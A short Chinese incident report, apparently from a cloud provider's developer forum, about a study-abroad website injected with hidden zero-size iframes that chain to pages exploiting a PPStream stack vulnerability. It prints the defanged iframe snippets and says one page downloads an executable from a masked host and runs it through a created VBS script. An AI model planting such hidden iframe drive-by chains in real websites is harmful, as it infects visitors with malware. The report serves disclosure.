AI 助理
备案控制台
开发者社区 安全 文章 正文

某留学网站被植入利用 PPStream 堆栈漏洞的代码

2024-09-28 26
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 某留学网站被植入利用 PPStream 堆栈漏洞的代码

网站被植入代码:

/---
<iframe src=hxxp://xxx.7**45*97**0.com/newdm/new05.htm?075 width=0 height=0></iframe>
---/

hxxp://xxx.7**45*97**0.com/newdm/new05.htm?075 包含代码:

/---
<iframe width='0' height='0' src='hxxp://xxx.7**45*97**0.com/wm/014.htm'></iframe>
<iframe width='0' height='0' src='hxxp://xxx.7**45*97**0.com/wm/pps.htm'></iframe>
---/

hxxp://xxx.7**45*97**0.com/wm/014.htm 下载 hxxp://down.d*j**7*78*8.cn/eeee.exe,创建 eeee.vbs 来实现运行。


文章标签:
安全
游客qeoynko2nmbgk
目录
相关文章
游客qeoynko2nmbgk
|
2月前
|
安全 JavaScript 前端开发
某论坛新游试玩区被植入利用ANI漏洞传播 Trojan.Mnless.kip 的代码
某论坛新游试玩区被植入利用ANI漏洞传播 Trojan.Mnless.kip 的代码
游客qeoynko2nmbgk
26 0
途途途途
|
3月前
|
数据采集 Web App开发 前端开发
不存在的!教你几招轻松绕过网站限制
不存在的!教你几招轻松绕过网站限制
途途途途
326 0
程序员小R
|
云安全 安全 开发工具
一觉醒来,小R的服务器被暴力破解,被植入挖矿程序?
一觉醒来,小R的服务器被暴力破解,被植入挖矿程序?
程序员小R
146 0
云安全专家
|
云安全 监控 安全
Java开发远程调试易埋隐患,JDWPMiner挖矿木马后门分析
近日,阿里云安全监测到一种利用JDWP RCE漏洞进行挖矿的恶意攻击,对用户资产危害极大,近期传播有所上升,提醒广大用户注意防护。
云安全专家
1021 0
Java开发远程调试易埋隐患,JDWPMiner挖矿木马后门分析
Linux驯兽师
|
存储 运维 NoSQL
服务器被植入挖矿程序排查案例
主机的操作系统是CentOS7,应用架构是Java+MySQL+Redis。客户描述问题是有一个从下午2点到凌晨的秒杀活动。秒杀系统开始的时候是可以正常运行的,但是到了晚上7点就突然无法使用了,前台提交秒杀请求后,后端无响应,最终超时退出。
Linux驯兽师
1002 0
服务器搭建网站
|
SQL 存储 安全
附件四常见漏洞危害及定义(先知计划)
服务器搭建网站
1923 0
技术小阿哥
|
监控 安全 测试技术
木马技术补充:木马加壳
技术小阿哥
1998 0
技术小阿哥
|
安全 Shell Windows
揪出系统中秘密隐藏的木马(下)
技术小阿哥
1632 0
技术小美
|
安全 数据安全/隐私保护
五一期间安全回顾 木马威胁提升 移动设备数据泄漏受重视
技术小美
2066 0
技术小阿哥
|
安全 Windows
揪出系统中秘密隐藏的木马(上)
技术小阿哥
1121 0